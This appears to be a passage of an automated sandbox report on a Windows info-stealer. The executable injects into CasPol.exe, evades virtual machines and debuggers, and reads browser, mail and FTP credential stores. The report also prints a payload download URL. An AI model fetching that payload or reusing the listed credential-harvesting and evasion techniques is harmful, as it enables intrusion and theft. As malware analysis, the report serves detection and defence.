Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_0040352D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe File created: C:\Users\user\AppData\Local\Temp\nsn8B13.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/5@2/2
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_004021AA CoCreateInstance, 2_2_004021AA
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 2_2_0040498A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 9TpV4rfMmJ.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: secur32.pdb source: secur32.dll.2.dr
Source: Binary string: SxsStore.pdb source: sxsstore.dll.2.dr
Source: Binary string: secur32.pdbUGP source: secur32.dll.2.dr
Source: Binary string: SxsStore.pdbGCTL source: sxsstore.dll.2.dr

Data Obfuscation

Source: Yara match File source: 00000005.00000000.250546924581.0000000000D00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_716630C0 push eax; ret 2_2_716630EE
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_04695064 push eax; retf 2_2_046950BC
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_04691E42 push ecx; iretd 2_2_04691E4B
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_04690A38 push edx; ret 2_2_04690A4B
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_04693D37 push esi; iretd 2_2_04693D7E
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_04694FEA push eax; retf 2_2_046950BC
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_04691EF0 push edi; retf 2_2_04691EFB
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_04690AA3 push ds; retf 2_2_04690AA4
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_046906A2 push edi; ret 2_2_046906A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_00D0F54B push ds; iretd 5_2_00D0F557
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_01162177 push edi; retn 0000h 5_2_01162179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_011663FC push E8009BBFh; ret 5_2_01166401
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_01220312 push 8BFFFFFFh; retf 5_2_01220318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_20032D3B push edx; retf 5_2_20032D3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_20032E10 push ecx; retf 5_2_20032E12
Source: secur32.dll.2.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_71661BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 2_2_71661BFF
Source: secur32.dll.2.dr Static PE information: 0xAEC0B68B [Mon Nov 27 15:00:27 2062 UTC]

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe File created: C:\Users\user\AppData\Local\Temp\secur32.dll Jump to dropped file
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe File created: C:\Users\user\AppData\Local\Temp\sxsstore.dll Jump to dropped file
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe File created: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665555642.0000000004790000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLBWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLB
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665555642.0000000004790000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://WWW.KONUTMARKET.COM/2022FILE_IZNUHDOSU25.BIN
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7492 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sxsstore.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9930 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_0116A630 sldt word ptr [eax] 5_2_0116A630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 2_2_00405C49
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_00406873 FindFirstFileW,FindClose, 2_2_00406873
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_0040290B FindFirstFileW, 2_2_0040290B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe API call chain: ExitProcess graph end node
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: CasPol.exe, 00000005.00000003.251683839425.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488312809.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW5
Source: CasPol.exe, 00000005.00000002.255487878510.0000000000E58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665555642.0000000004790000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlbwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlb
Source: CasPol.exe, 00000005.00000003.251683839425.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488312809.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665555642.0000000004790000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://www.konutmarket.com/2022file_izNuHdosu25.bin
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat

Anti Debugging

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_71661BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 2_2_71661BFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_0116BB60 LdrInitializeThunk, 5_2_0116BB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D00000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\SysWOW64\secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe" Jump to behavior

Language, Device and Operating System Detection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_0040352D

Stealing of Sensitive Information

Source: Yara match File source: 00000005.00000002.255513838667.000000001DEE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1264, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: Yara match File source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1264, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000005.00000002.255513838667.000000001DEE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1264, type: MEMORYSTR